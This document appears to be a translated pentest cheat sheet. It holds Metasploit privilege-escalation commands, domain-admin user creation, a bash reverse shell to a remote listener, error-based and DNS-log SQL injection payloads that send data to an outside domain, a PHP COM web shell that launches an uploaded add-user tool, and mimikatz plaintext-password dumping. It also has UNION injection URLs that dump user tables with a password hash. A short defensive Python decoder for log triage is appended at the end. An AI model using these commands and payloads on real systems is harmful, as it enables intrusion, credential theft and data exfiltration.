msf Privilege Escalation Basics (1)


A token is effectively a temporary system credential (account and password).

Load the incognito module:

meterpreter > use incognito

meterpreter > list_tokens -u    // list the available tokens

meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator   // impersonate a token

[+] Successfully impersonated user WIN-xxxxxx\Administrator  // impersonation as the Administrator user succeeded

meterpreter > getsystem   // automatically try the privilege-escalation techniques

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid   // identity of the current session user

Server username: NT AUTHORITY\SYSTEM


delegation: delegation token

impersonation: impersonation token

Two backslashes are required:

impersonate_token win7-pc\\administrator


Add a domain user:

net user ihoney ihoney1 /add /domain

Add it to the domain admins group:

net group "domain admins" ihoney /add /domain

View the domain admins group:

net group "domain admins" /domain

Upload an exe:

upload /root/ma.exe c:\


Compromised host (zombie):

[root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1

The attacker's machine listens first:

[root@yyy ~]# nc -vv -l -p 9999


Error-based injection:

 and 1=(updatexml(1,concat(0x3a,(user())),1))#


whois information gathering

Type whois followed by the target domain (without www),

or whois followed by the target IP address.

Advanced scan (find hosts in a range that have a given port open):

use auxiliary/scanner/ip/ipidseq
show options
set RHOSTS <target IP range, e.g. 2.0/24>
set THREADS 50
run

Scan the ports of a host:

use auxiliary/scanner/portscan/syn
show options
set RHOSTS <target IP>
set THREADS 50
run

Scan for hosts running the SMB service:

use auxiliary/scanner/smb/smb_version
show options
set RHOSTS <target range>/24
set THREADS 50
run

MSSQL hosts:

use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS <scan range>/24
set THREADS 50
run

SSH server scan:

use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS <scan range>/24
set THREADS 50
run

Telnet server scan:

use auxiliary/scanner/telnet/telnet_version
show options
set RHOSTS <scan range>/24
set THREADS 50
run

FTP host scan:

use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS <scan range>/24
set THREADS 50
run

Scan for FTP anonymous login:

use auxiliary/scanner/ftp/ftp_anonymous
show options
set RHOSTS <scan range>/24
set THREADS 50
run

Find which hosts on the LAN are alive:

use auxiliary/scanner/discovery/arp_sweep
set RHOSTS <scan range>/24
set THREADS 50
run

Scan website directories:

use auxiliary/scanner/http/dir_scanner
set RHOSTS <target IP>
set THREADS 50
run

Scan SNMP hosts:

use auxiliary/scanner/snmp/snmp_login
set RHOSTS <scan range>/24
set THREADS 50
run

Search for e-mail addresses belonging to the target site:

use auxiliary/gather/search_email_collector
set DOMAIN <target domain (without www)>
run

Sniff and capture packets (ftp):

use auxiliary/sniffer/psnuffle
run


HTTP/DNS log platform:

https://exeye.io/register


Blind SQL injection executed through a DNS log:

union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

When the database executes this, load_file() receives a UNC path (0x5c5c5c5c is four backslashes, and the second hex literal is the domain below) and the server resolves the dnslog domain:

xx.test1.ihoneysec.top/iii


[Update] MySQL authentication bypass vulnerability and its exploitation (CVE-2012-2122): www.freebuf.com/vuls/3815.html


Commonly used commands for privilege escalation:

whoami
net user
net view
net start                   // services that have been started
systeminfo
hostname
ipconfig /all
tasklist /svc               // look for TermService to find its PID
netstat -ano                // find the listening port
arp -a
route print
netsh firewall show state
netsh firewall show config
dir
type
copy


Related articles:

http://www.5kik.com/phpnews/3.html (executing commands from PHP with WSH and Shell.Application)

https://blog.csdn.net/jaray/article/details/49093317 ("COM not found" error when running PHP)

https://www.cnblogs.com/phpk/p/6097353.html (ini_set("display_errors","On"); and error_reporting(E_ALL);)

Prerequisite:

You need to know the website's path, then upload wucanshu.exe (F4ck's API add-user tool).


Visit http://ip/wsh.php

<?php
ini_set("display_errors", "On");   // show PHP errors so a COM failure is visible
error_reporting(E_ALL);
echo 1;
$wsh = new COM("shell.Application") or die("Failed!");   // abort if the COM object cannot be created
$exec = $wsh->open("C:\\www\\wucantishi.exe");           // launch the uploaded exe through Shell.Application
echo $exec;
echo 21;
?>


Running it adds a user through the API:

UserName: F4ck
PassWord: F4ckTeam!@#

Downloading large files with China Chopper (菜刀) may fail; rename the extension to .rar and download the file with a browser.

IIS 8.0 returns 404 by default for files with the .mdb extension, so they cannot be downloaded.


Two commands to read plaintext passwords:

privilege::debug
sekurlsa::logonpasswords

Loading mimikatz in msf to read plaintext passwords:

meterpreter > use mimikatz
meterpreter > wdigest

F4ck add-user with parameters:

7.exe ceshi 12345678 administrator /add

This clones an administrator user.


Captured sqlmap statement that dumps all database names:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

Manual test to read the database names:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

Table names:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

Column names:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

Read the accounts and passwords:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

[0001]《1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2
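The payloads above (the load_file DNS-log injection and the captured sqlmap query) hide their strings in MySQL hex literals, which is what a WAF or access-log reviewer has to undo by hand. The helper below is an added example for that triage, not code from the original notes: the function names are mine, and the two sample payloads are copied from this page.

```python
import re
from urllib.parse import unquote

# MySQL hex literal: 0x followed by an even count of hex digits (e.g. 0x3a -> ':')
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")
# sqlmap wraps extracted values in random 5-letter markers such as qjbjq ... qqxkq
SQLMAP_MARKER = re.compile(r"^q[a-z]{3}q$")
# Constructs worth flagging in log review: file access, error-based, schema enumeration
RISKY_FUNCS = ("load_file", "updatexml", "extractvalue", "information_schema")

def decode_hex_literals(payload: str) -> dict:
    """Map every 0x... literal in the payload to its decoded text (latin-1, lossless)."""
    return {"0x" + m.group(1): bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(payload)}

def readable(payload: str) -> str:
    """URL-decode the payload and swap each hex literal for a quoted string."""
    text = unquote(payload)
    return HEX_LITERAL.sub(lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", text)

def triage(payload: str) -> dict:
    """Summarise a captured payload: decoded literals, sqlmap markers, risky constructs."""
    text = unquote(payload)
    literals = decode_hex_literals(text)
    return {
        "readable": readable(payload),
        "literals": literals,
        "sqlmap_markers": [v for v in literals.values() if SQLMAP_MARKER.match(v)],
        "risky": [f for f in RISKY_FUNCS if f in text.lower()],
    }

# Sample payloads copied from the notes above (the dnslog one and the captured sqlmap one).
DNSLOG_PAYLOAD = ("union select 1,load_file(concat(0x5c5c5c5c,version(),"
                  "0x78782E74657374312E69686F6E65797365632E746F702F696969));")
SQLMAP_PAYLOAD = ("28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name "
                  "AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
                  "FROM INFORMATION_SCHEMA.SCHEMATA%23")

if __name__ == "__main__":
    for p in (DNSLOG_PAYLOAD, SQLMAP_PAYLOAD):
        r = triage(p)
        print(r["readable"])
        print("  sqlmap markers:", r["sqlmap_markers"], " risky:", r["risky"])
```

Run on the first payload it prints the UNC path `'\\\\' + version() + 'xx.test1.ihoneysec.top/iii'`; on the second it exposes the qjbjq/qqxkq markers that identify sqlmap output in logs.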

 

 



 
Guangdong ICP filing no. 18138465   © 2018-2025 CODEPRJ.COM